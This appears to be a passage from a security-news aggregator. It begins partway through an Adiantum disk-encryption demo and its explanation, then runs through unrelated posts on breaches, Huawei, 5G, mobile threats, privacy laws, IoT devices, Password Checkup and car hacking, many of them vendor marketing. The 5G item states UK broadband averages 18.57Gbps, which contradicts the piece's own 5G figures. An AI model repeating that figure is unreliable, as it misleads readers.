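    CR = _xor(CM, _hash(kh, tweak, CL))                 # second hash pass: same strength when decrypting
    return CL + CR

def decrypt(keys, tweak: bytes, ciphertext: bytes) -> bytes:
    kh, kb, ks = keys
    CL, CR = ciphertext[:-16], ciphertext[-16:]
    CM = _xor(CR, _hash(kh, tweak, CL))
    PL = _xor(CL, chacha_keystream(ks, CM[:12], len(CL)))
    PM = _block(kb, CM, decrypt=True)
    PR = _xor(PM, _hash(kh, tweak, PL))
    return PL + PR

def changed_bytes(a: bytes, b: bytes) -> int:
    return sum(x != y for x, y in zip(a, b))

def demo():
    """Encrypt a 4096-byte sector, flip one plaintext bit, count ciphertext bytes that change."""
    keys = (b"\x01" * 32, b"\x02" * 32, b"\x03" * 32)   # constructed fixed keys, illustration only
    tweak = struct.pack("<Q", 42)                        # the sector number plays the tweak role
    pt = bytes(range(256)) * 16                          # constructed 4096-byte sector
    ct = encrypt(keys, tweak, pt)
    assert len(ct) == len(pt) and decrypt(keys, tweak, ct) == pt
    flipped = bytearray(pt); flipped[100] ^= 0x01
    wide = changed_bytes(ct, encrypt(keys, tweak, bytes(flipped)))
    # Contrast: a bare stream cipher is length-preserving too, but the flip shows through as one byte.
    ks = chacha_keystream(keys[2], bytes(12), len(pt))
    narrow = changed_bytes(_xor(pt, ks), _xor(bytes(flipped), ks))
    return wide, narrow

if __name__ == "__main__":
    print("wide-block bytes changed / stream-cipher bytes changed:", demo())
```

Running demo() reports roughly 4080 changed bytes for the wide-block construction (every byte of the ciphertext changes except the one in 256 that happens to coincide) against exactly one for the bare stream cipher. That single byte is the malleability problem: with a stream cipher, or with a narrow-block mode, an attacker who can write to the storage can flip chosen plaintext bits without knowing the key, whereas in a wide-block mode any edit turns the whole sector into noise.
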
Cryptographic primitives like ChaCha are organized in "rounds", with each round increasing our confidence in security at a cost in speed. To make disk encryption fast enough on the widest range of devices, we've opted to use the 12-round variant of ChaCha rather than the more widely used 20-round variant. Each round vastly increases the difficulty of attack; the 7-round variant was broken in 2008, and though many papers have improved on this attack, no attack on 8 rounds is known today. This ratio of rounds used to rounds broken today is actually better for ChaCha12 than it is for AES-256.

Even though Adiantum is very new, we are in a position to have high confidence in its security. In our paper, we prove that it has good security properties, under the assumption that ChaCha12 and AES-256 are secure. This is standard practice in cryptography; from "primitives" like ChaCha and AES, we build "constructions" like XTS, GCM, or Adiantum. Very often we can offer strong arguments but not a proof that the primitives are secure, while we can prove that if the primitives are secure, the constructions we build from them are too. We don't have to make assumptions about NH or the Poly1305 hash function; these are proven to have the cryptographic property ("ε-almost-∆-universality") we rely on.
Adiantum is named after the genus of the maidenhair fern, which in the Victorian language of flowers (floriography) represents sincerity and discretion.

Additional resources

The full details of our design, and the proof of security, are in our paper Adiantum: length-preserving encryption for entry-level processors in IACR Transactions on Symmetric Cryptology; this will be presented at the Fast Software Encryption conference (FSE 2019) in March.

Generic and ARM-optimized implementations of Adiantum are available in the Android common kernels v4.9 and higher, and in the mainline Linux kernel v5.0 and higher. Reference code, test vectors, and a benchmarking suite are available at https://github.com/google/adiantum.

Android device manufacturers can enable Adiantum for either full-disk or file-based encryption on devices with AES performance <= 50 MiB/sec and launching with Android Pie. Where hardware support for AES exists, AES is faster than Adiantum; AES must still be used where its performance is above 50 MiB/s. In Android Q, Adiantum will be part of the Android platform, and we intend to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms.

Acknowledgements: This post leveraged contributions from Greg Kaiser and Luke Haviland. Adiantum was designed by Paul Crowley and Eric Biggers, implemented in Android by Eric Biggers and Greg Kaiser, and named by Danielle Roberts.

Mumsnet reports itself to regulator over data breach

Company apologises after bug meant users were able to log into accounts of strangers

Mumsnet has reported itself to the information commissioner after a data breach resulted in users accidentally logging into the accounts of strangers.

Are you missing out on the AppSec conversation that will benefit your program?

There are a growing number of application security-related conversations – conversations around paralyzing breaches, increasing regulations, and risky open source code. Many of these conversations occur in small groups, resulting in action items for stakeholders who are often not involved in the conversation. How can those conversations include the voices of all the different stakeholders of application security – those who are accountable and impacted?

The 9th annual State of Community Management (SOCM) report released in 2018 by The Community Roundtable confirmed that communities are change agents for dispersing knowledge, sharing information, and, most importantly, enabling conversations across organizations, among peers, and with subject-matter-experts. One significant recommendation of that research was for communities to play a greater role in functions where sharing of information is critical. As I begin responding to the 2019 SOCM survey, I see how each stakeholder within our customer base has begun to participate in the application security conversation, and I see how these conversations can directly influence the speed at which organizations secure their software.

Online tutorials, technical support, and customer success teams (Security Program Managers at Veracode!) provide excellent guidance on resolving challenges and building execution strategies. However, those conversations specifically help you, help your organization, and help your strategy. The Veracode Community is a valuable part of this resource mix and includes your peers in those conversations – your peers who have experienced similar challenges, countless failures, and found their best practice. That best practice could be your best practice. These conversations can begin with a “how do I” question, a “why is this happening” question, or “who else has experienced this” question. We have an opportunity to build a global conversation on application security and each step toward secure software.

Perhaps as the security practitioner in your organization, the conversation is understanding how best to structure your program.

As the developer or manager of a development team, it’s understanding the impact to your software development process, ways to minimize that impact, and ways to get ahead of the flaws found in the code.

As a product manager, it’s understanding the value of adding this extra step – application security – in getting your product to market.

As a marketing executive, it’s understanding the value of including the security of your product in your company message.

As the company executive, it’s understanding the value of the investment in application security.

In what part of the application security conversation will you participate?

The Veracode Community enables these conversations, captures our customers’ ideas to drive product advancement, and supports your application security needs. Click here to see the features of the Veracode Community that will springboard your participation in the application security conversation that will support your efforts.

Is Huawei a Threat to UK National Security?

On 19th July 2018 the UK government, through the GCHQ-backed Huawei Cyber Security Evaluation Centre (HCSEC), gave only “limited assurance” that Huawei poses no threat to UK national security. Since then, politicians and security services across the UK, the EU and NATO member states have raised concerns about the nation-state cyber threat posed by the Chinese telecoms giant. 

There has been particular political unease about Huawei's provision of network infrastructure devices (switches, routers and the like) within the UK national infrastructure: devices which control network traffic and are positioned to access the data that traverses them. Huawei has been operating in the UK market for 18 years, and whether it is smartphones or network devices, Huawei products are generally far cheaper than their competitors' equivalents. This has led major telecoms providers such as BT to purchase and deploy Huawei network devices within their telecommunications infrastructure and data centres, some of which are regarded as critical components of the UK national infrastructure. As such, Huawei has been subject to unfavourable security scrutiny, which has recently spilt over into the political and media arenas. 


Huawei has always denied that its products pose a threat, and no evidence of any malicious capability or activity has been publicly disclosed by any UK intelligence agency or cyber security firm. But there is also China's 2017 National Intelligence Law, which states that Chinese organisations are obliged to "support, cooperate with, and collaborate in, national intelligence work".

Three nations in the ‘Five Eyes’ intelligence alliance, the United States, Australia and New Zealand, have effectively prohibited the installation of Huawei equipment within their next-generation (5G) telecommunications networks. The remaining two members, the United Kingdom and Canada, are expected to state their positions within the coming months. The UK's National Cyber Security Centre has published warnings about the Chinese company's security standards. Elsewhere, nations including France, Germany and India have expressed concerns about the use of Huawei equipment in their 5G upgrades.


On 4th February 2019, a leaked draft of the Huawei Cyber Security Evaluation Centre's 2019 report said that the issues and findings it had raised previously had not been fully addressed by Huawei, and was critical of the security of Huawei's technology.

Then on 6th February 2019, a letter sent to MPs by Huawei was published. In it Huawei said it could take up to five years to address the security issues raised by the Huawei Cyber Security Evaluation Centre, at a cost of $2bn (£1.5bn) of its own money. The president of Huawei's carrier business group also said the process of adapting its software and engineering processes to meet the UK's requirements was "like replacing components on a high-speed train in motion".

Huawei also made the following points in the letter to rebut the threat allegations,  "Huawei is a closely watched company.  Were Huawei ever to engage in malicious behaviour, it would not go unnoticed - and it would certainly destroy our business. For us, it is a matter of security or nothing; there is no third option. We choose to ensure security." The letter also addressed the Chinese 2017 National Intelligence Law, stating "no Chinese law obliges any company to install backdoors", a position they have backed up by an international law firm based in London. The letter went on to say that Huawei would refuse requests by the Chinese government to plant backdoors, eavesdropping or spyware on its telecommunications equipment.

The ball is now in the UK government's court; in the next couple of months we shall see whether the UK Government bans Huawei or continues to work with the company to manage the implied national security threat of its products. A ban could well result in Huawei pulling out of the UK market altogether, taking its billions of pounds of investment with it, and would likely have a negative impact on post-Brexit trade deal negotiations between the UK and China, so we can expect the situation to become even more political in the short term.

Huawei Threat News Timeline
Who are Huawei?
  • Chinese multinational conglomerate which specialises in telecommunications equipment, consumer electronics and technology-based services and products
  • HQ in Shenzhen, Guangdong
  • Founded in 1987 by Ren Zhengfei, a former engineer in the People's Liberation Army
  • Largest telecommunications-equipment manufacturer in the world
  • Overtook Apple in 2018 to become the second-largest manufacturer of smartphones in the world
  • 72nd on the Fortune Global 500 list
  • 180,000 employees
  • The Chinese military remains an important customer for Huawei
  • Invests billions into R&D around the world
  • 3 billion customers globally
  • Operating within the UK for 18 years
  • Made a five-year commitment (2018 to 2023) to invest £3 billion in the UK
  • Allegations that its equipment may contain backdoors allowing unauthorised surveillance and/or data theft by the Chinese government and the People's Liberation Army
The 5G Evolution
5G is expected to emerge in the UK in late 2019 and early 2020, and will be much faster than 4G. The theoretical maximum speed for 4G is 1Gbps, while the theoretical maximum speed for 5G is 20Gbps, so 5G is potentially up to 20 times faster than 4G. It is also potentially faster than the UK average broadband speed, which stands at 18.57Gbps.

Mobile networks are changing with the arrival of 5G, and the impact of this change will be felt across the industry. Adrian Taylor, regional VP of sales for A10 Networks, provides the following insight into the impact of 5G on the market and how it will change the enterprise world.

5G and the Evolution of Mobile Networks
Fifth generation networks, just like the preceding 4G LTE and WiMAX networks, are expected to greatly increase available bandwidth, with improved end-to-end performance providing a better end-user experience. In the most basic of terms, 4G LTE was the long-term evolution of Radio Access Networks (RAN); 5G is the next iteration.

Wireless carriers have invested billions into their networks to support the ongoing demand for faster network speeds. They must look for ways to increase revenue while delivering more value to the end user. This continues to drive new devices into the hands of the consumer. The demand for increased efficiencies, bandwidth, and coverage has pushed carriers towards a decentralised deployment model.

Network Virtualisation Remains in The Early Stages
Service providers monitor and review technology for advancements that will help deliver faster and less expensive networks. Recently, they have looked into areas of Network Function Virtualisation (NFV) and automation to support their advancements. Mobile network operators are investing heavily in reducing delays and errors through repetitive processes as they build and add capacity to existing 4G networks.

Virtualisation and Software Defined Networks (SDN) improvements are driving a shift from hardware to software. SDN is promising, but it’s not an instant solution, as purpose-built hardware still remains the preferred choice. NFV and SDN have offered service providers an alternative to existing methods, including dedicated appliances sitting idle. However, it’s safe to say that the age of virtualisation remains in the early stages.


Hardware manufacturers and service providers are now betting on the acceptance and success of virtualised functions. Software development continues at breakneck speed to meet timelines and demands for more integrated solutions, which easily scale and reduce operational overheads at the same time.

The 5G Revenue Opportunity
5G’s impact is expected to extend beyond the typical mobile network carriers/operators such as Virgin Media, EE, O2, and Sky in the UK and overseas. It promises to enable increased connectivity and flexibility that will drive additional functions throughout all supporting components of a mobile carrier’s network.

RAN access providers face the question of how to support the ever-increasing appetite for cutting the cord. How can we use our mobile devices in more ways than previously thought, as the end user goes about their daily tasks? This mobility, whether it’s tied to a carrier’s technology or even a simple Wi-Fi home network, reaches all corners of our day-to-day life.

This reach extends from the cloud to the data centre environments and continues to drive capacity needs, supported by both legacy appliances and the ever-increasing virtual environments. This continued appetite for consumption has opened up opportunities for all facets of technology and associated vendors.

5G Mobile Network Evolution
The continued expansion of 5G networks will have a revolutionary impact upon every mobile subscriber and business in the world.

The fundamental market forces of network evolution are not based on wired or wireless infrastructure. Companies are currently focused on upgrading existing mobile networks, while at the same time NFV, SDN and the global IoT industry are all preparing to utilise the next generation of mobile networks.

Software solutions are easier to move from concept to production and frequently offer a lower up-front investment cost. This all adds up to help drive increased functionality for all service providers, including the wired infrastructure.

5G and IoT will be demand-driven. As a result, the more the infrastructure expands to meet that demand, the more opportunities will be uncovered. It’s a positive feedback loop that will revolutionise how we think of the internet.

Get ready for a world that will be changed forever with the next generation mobile networks on the horizon.

      Your Mobile Phone: Friend or Foe?

      Where would we be without our mobile phones?  Our kids, boss, friends – so many people reach out to us via our mobile phone.  And unfortunately, hackers have also started reaching out – in major ways. The severity of attacks on mobile devices is often underestimated. It is now common to have employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, giving cybercriminals the opportunity to access sensitive information if and when they hack into an employee’s phone. Let’s take a closer look at some of the common mobile threats that put your business at risk and how to prevent them.

      App-Based Threats

      Although new mobile malware declined by 24% in Q3 2018, per our latest Quarterly Threats Report, app-based threats still dominate the threat landscape. Malicious actors use social engineering techniques by asking users to update their applications by uninstalling the real app and re-installing a malicious one. With one click, malware can be installed on your mobile device.

      Many app-based threats can evolve into more insidious attacks and can go beyond exploiting your personal information. An attacker’s initial goal is to get access and all they need is one vulnerable employee to fall victim to an app-based threat. Once the attacker gains access to an employee’s personally identifiable information (PII) or credentials, they can hijack accounts, impersonate the employee, and trick other employees into divulging even more sensitive corporate data.

      Late last year, the McAfee Mobile Research team discovered an active phishing campaign that uses text messages (SMS) to trick users into downloading and installing a fake voice-message app. The app allowed cybercriminals to use infected devices as network proxies without the users’ knowledge.

      This year, we expect to see an increase in underground discussions on mobile malware—mostly focused on Android—regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security.

      Risky Wi-Fi Networks

      Using public Wi-Fi is one of the most common attack vectors for cybercriminals today. With free public Wi-Fi widely available in larger cities, it has become a convenient way to access online accounts, check emails, and catch up on work while on the go. The industry has seen network spoofing increase dramatically in the past year. To put this into perspective, picture a hacker setting up a rogue access point in a public place like your local bank. A hacker will wait for you to connect to Wi-Fi that you think is a trusted network. Once the hacker gains access, they’re connected to your mobile device. They’ll watch remotely as you access sensitive information, revealing log-in credentials, confidential documents, and more.

      Whether you are at home or working remotely, network security needs to be a high priority.

      Device Attacks

      Cybercriminals have various ways of enticing users to install malware on their mobile devices. Ad and click fraud is a growing concern for device attacks, where criminals can gain access to a company’s internal network by sending an SMS phish. These types of phishing attempts may start as adware, but can easily escalate to spyware or enrol the device in a botnet.

      Another growing concern with mobile device threats is when malware is hidden in other IoT devices and the information obtained by the hacker can be used as an entry point to your mobile device or your company network. With IoT malware families rapidly being customized and developed, it’s important for users to be aware and know how to protect themselves.

      How to Better Protect Your Mobile Device


      Mobile devices have all the organizational information that traditional endpoints have. McAfee® MVISION Mobile lets you protect against threats to your employees and your data on iOS and Android devices like you do on your PCs. With MVISION Mobile, you can manage the defense of your mobile devices alongside your PCs, IoT devices, servers, and cloud workloads inside McAfee ePolicy Orchestrator (McAfee ePO) with unified visibility into threats, integrated compliance reporting, and threat response orchestration.

      The most comprehensive mobile device security is on the device itself, and MVISION Mobile delivers unparalleled on-device protection. Visit our web site for more information, and a product tour.

      The post Your Mobile Phone: Friend or Foe? appeared first on McAfee Blogs.

      Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity

      Veracode Ohio SB 220 Data Protection Act

      In the last two years alone, there have been a number of high-profile breaches that have given organizations pause, prompting them to consider whether the same kind of event could happen to them. After all, a cybersecurity breach could seriously damage or even level your business if you’re not prepared and do not have the appropriate security programs in place. We’ve seen the implementation of the NYDFS Cybersecurity Regulation, and recent breaches have led to serious fines, potentially in the billions, for violating GDPR.

      Most recently, we saw the Ohio Senate Bill 220 (S.B. 220) signed into law and go into effect as of Nov. 2, 2018. S.B. 220, known as the Data Protection Act, serves as an incentive to businesses to ensure that they achieve and maintain a higher level of security by maintaining industry-standard cybersecurity programs.

      Recent research has shown that the average cost of a data breach globally is $3.86 million – an increase of 6.4 percent from 2017. As data breaches grow in prevalence and the cost to organizations continues to rise, S.B. 220 serves as a legal “safe harbor” for firms operating in Ohio if they are sued for negligently failing to implement reasonable information security controls, resulting in a data breach. The organization can use its compliance with the cybersecurity controls as an affirmative defense, assuming it is in compliance with one of eight industry frameworks:

      • NIST SP 800-171
      • NIST SP 800-53 and 800-53(a)
      • The Federal Risk and Authorization Management Program (FedRAMP)
      • Center for Internet Security (CIS) Critical Security Controls
      • The ISO 27000 Family
      • The HIPAA Security Rule
      • Gramm-Leach-Bliley Act
      • The Federal Information Security Modernization Act (FISMA)

      It is important to note that the Data Protection Act “does not, and is not intended to, create a minimum cybersecurity standard that must be achieved,” and it is not to “be read to impose liability upon businesses that do not obtain or maintain” a cybersecurity program that is compliant with one of the eight recognized frameworks listed above. In fact, the bill highlights that there is no silver-bullet approach to cybersecurity, and in order for an organization to call upon the “safe harbor,” it needs to have a program with a scope and scale appropriate to factors like the size and nature of the business, and the level of personally identifiable information it collects and carries.

      In the end, it pays for companies to implement proper cybersecurity programs, because doing so reduces the risk of a breach and mitigates legal risk if a breach occurs. At the same time, cybersecurity protections are still evolving, and organizations are starting to understand that when they focus solely on network security, web application firewalls, or data leakage prevention tools, they are leaving a key attack surface vulnerable: their web applications.

      The past few years have seen a marked increase in the number and severity of successful attacks aimed at the application layer, and our State of Software Security report has shown that 85 percent of applications have at least one vulnerability on initial scan. To begin implementing an AppSec program that scales to the size and needs of your organization – and reduces the risk associated with building, buying, and borrowing software – download our Ultimate Guide to Getting Started with Application Security.

      Customers Blame Companies not Hackers for Data Breaches

      RSA Security's latest research reveals that over half (57%) of consumers blame companies ahead of hackers if their data is stolen. Consumer backlash in response to the numerous high-profile data breaches in recent years has exposed one of the hidden risks of digital transformation: loss of customer trust.

      The RSA Data Privacy & Security Survey 2019 identified that companies have lost the trust of customers as a disconnect has formed between how companies are using customer data and how consumers expect their data to be used.

      Despite the fact that consumers harbour heightened concerns about their privacy, they continue to exhibit poor cyber hygiene, with 83% of users admitting that they reuse the same passwords across many sites, leaving them more vulnerable.

      Key takeaways from the RSA Data Privacy study, include:

      • Context matters: Individuals across all demographics are concerned about their financial/banking data, as well as sensitive information such as passwords, but other areas of concern vary dramatically by generation, nationality and even gender. For example, younger demographics are more comfortable with their data being used and collected than older survey respondents.
      • Privacy expectations are cultural: Consumers respond to data privacy differently based on their nationality, due to cultural factors, current events and high-profile data breaches in their respective countries. For example, in the months after GDPR was implemented, German attitudes shifted in favour of stricter data privacy expectations, with 42% wanting to protect location data in 2018 versus only 29% in 2017.
      • Personalisation remains a puzzle: Countless studies have demonstrated that personalised experiences increase user activity and purchasing. However, the survey results showed that respondents do not want personalised services at the expense of their privacy. In fact, a mere 17% of respondents view tailored advertisements as ethical, and only 24% believe personalisation to create tailored newsfeeds is ethical.

      “With a growing number of high-profile data breaches, questions around the ethical use of data and privacy missteps, consumers increasingly want to know how their data is being collected, managed and shared,” said Nigel Ng, Vice President of International, RSA. “Now is the time for organisations to evaluate their growing digital risks, doubling down on customer privacy and security. Today’s leaders must be vigilant about transforming their cybersecurity postures to manage today’s digital risks in a way that ensures consumer trust and confidence in their business.”

      EU recalls children’s smartwatch over data fears

      European commission says Enox Safe-Kid-One can easily be hacked and poses risk to children

      A children’s wristwatch that allows the wearer to be easily contacted and located has been recalled by Brussels over safety fears.

      The European commission said the Enox Safe-Kid-One, which comes fitted with a global positioning system (GPS), a microphone and speaker, posed a serious risk to children.


      Should you pull your smart plug?

      While some may think, “why would I need my toaster to connect to the internet,” smart home devices continue to become more and more popular. In fact, a recent study by Intel found that by 2025, 71% of Americans will have at least one smart device in their home. For many that aren’t ready to replace their favorite “dumb” appliances, smart plugs are an easy and affordable way to connect anything. But, do they leave your virtual “front door” wide open for cybercriminals?

      In the latest episode of “Hackable?” our host Geoff Siskind and the team investigate just how risky smart plugs are for homeowners. Can just one weak link compromise your entire home network? To find out, Geoff invites a white-hat to hack the smart plug in his studio. Learn if your smart home and devices are at risk.

      Listen now to the award-winning podcast “Hackable?” on Apple Podcasts!

      The post Should you pull your smart plug? appeared first on McAfee Blogs.


      Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates

      Patrick Butler, CEO of the Australian cybersecurity firm Loop Secure, is excited about how the cloud is growing his business. His clients are enthused too by the tremendous opportunities and advantages the cloud presents. They’re also a little scared.

      “Every year more companies are digitizing all aspects of their business—from manufacturing plants coming online to new ways of serving up information to customers,” says Butler, whose firm provides a full range of cybersecurity services, from one-time red team engagements to managing security operations, primarily for midsize enterprises. “It’s exciting what technology can do to transform what we do with computers. … We’re seeing a huge uptake in collaboration technology, with a lot of customers moving to AWS [Amazon Web Services].”

      But Butler acknowledges his clients’ fears—putting sensitive data in the cloud introduces new risks. “Our job is to help customers leverage digital transformation positively without having to worry about the risks, [such as] breaches and brand reputation damage,” he says. “We’ve had to focus on how we protect them in [the cloud and] those areas of their business—areas that have traditionally been quite dark.”

      The Challenge of Securing the Cloud

      “Setting up security for the cloud can be quite technical,” Butler explains. “There are a lot of configuration options. … Yes, the cloud brings a lot of speed and scale, but one wrong configuration and suddenly you have an AWS S3 bucket available to the broader public with all of your confidential information on it. The cloud brings benefits, but it also brings new and different risks.”

      Confidently Securing the Cloud with Help from McAfee

      As one of the longest-running cybersecurity companies in Australia, Loop Secure has been a McAfee partner for over a decade. For its clients moving operations into the cloud, the firm primarily uses McAfee solutions to help them reach their security objectives—easily and effectively. For instance, for a midsize services client, Loop Secure implemented McAfee® Virtual Network Security Platform (McAfee vNSP), a complete network threat and intrusion prevention system (IPS) built for the unique demands of private and public clouds. Using McAfee vNSP allowed the company to apply the same robust security policies to endpoints within AWS as on premises.

      “What McAfee brings to the table is a comprehensive portfolio, scale, and focus,” Butler explains. “Like us, McAfee focuses only on cybersecurity. That’s important. … To us, the McAfee ‘Together is Power’ mantra means that with McAfee we have a broader team—our people plus McAfee people and products—all dedicated to keeping our clients’ data and environments safe.”

      Many of Butler’s clients use McAfee endpoint, networking, and/or web protection solutions and McAfee ePolicy Orchestrator® (McAfee ePO™). In the near future, Butler looks forward to offering them McAfee MVISION, an innovative, integrated, open system from device to cloud. McAfee MVISION could simplify security for these Loop Secure customers by providing consolidated visibility, comprehension, and control across their entire digital estate.

      With the acceleration of cloud adoption by its clients and McAfee’s device-to-cloud approach, “The future’s pretty exciting for both us and McAfee,” Butler says.

      View below for a short video interview with Patrick Butler. Get your questions answered by tweeting @McAfee_Business.

      The post Australian Cybersecurity Firm Experiences Exciting Times as Clients’ Shift to Cloud Accelerates appeared first on McAfee Blogs.

      Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety

      Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

      While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

      But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

      Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

      • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
      • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
      • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
      • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
      • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

      And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

      The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

      Protect your accounts from data breaches with Password Checkup

      Update (Feb 6): We have updated the post to clarify a protocol used in the design is centered around private set intersection.

      Google helps keep your account safe from hijacking with a defense in depth strategy that spans prevention, detection, and mitigation. As part of this, we regularly reset the passwords of Google accounts affected by third-party data breaches in the event of password reuse. This strategy has helped us protect over 110 million users in the last two years alone. Without these safety measures, users would be at ten times the risk of account hijacking.

      We want to help you stay safe not just on Google, but elsewhere on the web as well. This is where the new Password Checkup Chrome extension can help. Whenever you sign in to a site, Password Checkup will trigger a warning if the username and password you use are among the more than 4 billion credentials that Google knows to be unsafe.

      Password Checkup was designed jointly with cryptography experts at Stanford University to ensure that Google never learns your username or password, and that any breach data stays safe from wider exposure. Since Password Checkup is an early experiment, we’re sharing the technical details behind our privacy preserving protocol to be transparent about how we keep your data secure.

      Key design principles

      We designed Password Checkup with three key principles in mind:

      • Alerts are actionable, not informational: We believe that an alert should provide concise and accurate security advice. For an unsafe account, that means resetting your password. While it’s possible for data breaches to expose other personal data such as a phone number or mailing address, there’s no straightforward next step to re-securing that data. That’s why we focus only on warning you about unsafe usernames and passwords.
      • Privacy is at the heart of our design: Your usernames and passwords are incredibly sensitive. We designed Password Checkup with privacy-preserving technologies to never reveal this personal information to Google. We also designed Password Checkup to prevent an attacker from abusing Password Checkup to reveal unsafe usernames and passwords. Finally, all statistics reported by the extension are anonymous. These metrics include the number of lookups that surface an unsafe credential, whether an alert leads to a password change, and the web domain involved for improving site compatibility.
      • Advice that avoids fatigue: We designed Password Checkup to only alert you when all of the information necessary to access your account has fallen into the hands of an attacker. We won’t bother you about outdated passwords you’ve already reset or merely weak passwords like “123456”. We only generate an alert when both your current username and password appear in a breach, as that poses the greatest risk.

      Settling on an approach

      At a high level, Password Checkup needs to query Google about the breach status of a username and password without revealing the information queried. At the same time, we need to ensure that no information about other unsafe usernames or passwords leaks in the process, and that brute force guessing is not an option. Password Checkup addresses all of these requirements by using multiple rounds of hashing, k-anonymity, and private set intersection with blinding.

      Our approach strikes a balance between privacy, computation overhead, and network latency. While single-party private information retrieval (PIR) and 1-out-of-N oblivious transfer solve some of our requirements, the communication overhead involved for a database of over 4 billion records is presently intractable. Alternatively, k-party PIR and hardware enclaves present efficient alternatives, but they require user trust in schemes that are not widely deployed yet in practice. For k-party PIR, there is a risk of collusion; for enclaves, there is a risk of hardware vulnerabilities and side-channels.

      A look under the hood

      Here’s how Password Checkup works in practice to satisfy our security and privacy requirements.


      Protecting your accounts

      Password Checkup is currently available as an extension for Chrome. Since this is a first version, we will continue refining it over the coming months, including improving site compatibility and username and password field detection.

      Acknowledgements

      This post reflects the work of a large group of Google engineers, research scientists, and others including: Niti Arora, Jacob Barrett, Borbala Benko, Alan Butler, Abhi Chaudhuri, Oxana Comanescu, Sunny Consolvo, Michael Dedrick, Kyler Emig, Mihaela Ion, Ilona Gaweda, Luca Invernizzi, Jozef Janovský, Yu Jiang, Patrick Gage Kelly, Nirdhar Khazanie, Guemmy Kim, Ben Kreuter, Valentina Lapteva, Maija Marincenko, Grzegorz Milka, Angelika Moscicki, Julia Nalven, Yuan Niu, Sarvar Patel, Tadek Pietraszek, Ganbayar Puntsagdash, Ananth Raghunathan, Juri Ranieri, Mark Risher, Masaru Sato, Karn Seth, Juho Snellman, Eduardo Tejada, Tu Tsao, Andy Wen, Kevin Yeo, Moti Yung, and Ali Zand.

      Automotive Technologies and Cyber Security

      A guest article authored by Giles Kirkland
      Giles is a car expert and dedicated automotive writer with a great passion for electric vehicles, autonomous cars and other innovative technologies. He loves researching the future of motorisation and sharing his ideas with auto enthusiasts across the globe. You can find him on Twitter, Facebook and at Oponeo.


      Surveys show that about half of people in the UK feel that driverless vehicles will make their lives much easier and are eagerly anticipating the arrival of this technology. Cities expect that once driverless car technology is fully implemented, the gridlock which now plagues their streets will be relieved to a large extent. Auto-makers predict that the new technology will encourage a surge in vehicle purchases, and technology companies are lining up with the major auto manufacturers to lend their experience and knowledge to the process, hoping to earn huge profits.



      Delays to Driverless Technology
      While some features of autonomous technology have already been developed and have been rolled out in various new vehicles, the full technology will probably not be mature for several decades yet. One of the chief holdups is in establishing the infrastructure necessary on the roads themselves and in cities, in order to safely enable driverless operation.

      The full weight of modern technology is pushing development along at a breakneck pace. Unlike the safety testing of the past, where a handful of real-life scenarios were simulated to anticipate vehicle reactions, high-powered simulators have now been set up to increase the speed at which vehicle software can 'learn' what to do in those real-life situations. This enables learning at a rate far greater than anything possible with vehicles of the past, which is not surprising, since vehicles of the past were not equipped with the 'brains' that autonomous cars will have.

      The Cyber Security aspect of Autonomous Vehicles
      Despite the enormous gains that autonomous vehicles promise, both socially and economically, some problems will inevitably arise, and industry experts agree that the biggest of these threats is cyber security. A well-known 2015 incident dramatically illustrated the possibilities. That year, security researchers (white-hat hackers) remotely took control of a Jeep Cherokee by exploiting a flaw in its Internet-connected Uconnect infotainment system, reaching the vehicle over the cellular network and, among other things, cutting its transmission while it was being driven on a highway. The demonstration led Fiat Chrysler to recall 1.4 million vehicles to patch the flaw, and provided the world with an alarming illustration of what someone with criminal intent could do after breaching the security of a vehicle.

      Cars of today have as many as 100 electronic control units (ECUs) running more than 100 million lines of code, which presents a huge attack surface to the criminally minded. An attacker who gains control of a peripheral ECU, for instance the one handling Bluetooth, can then try to reach, over the in-vehicle networks such as the CAN bus, the ECUs responsible for a whole host of safety systems; whether that pivot succeeds depends on how strictly the gateway between the infotainment network and the safety-critical buses filters traffic. Connected cars of the future will have even more ECUs controlling the vehicle's operations, and with them even more opportunities for cyber attack.


      Defense against Cyber Attacks
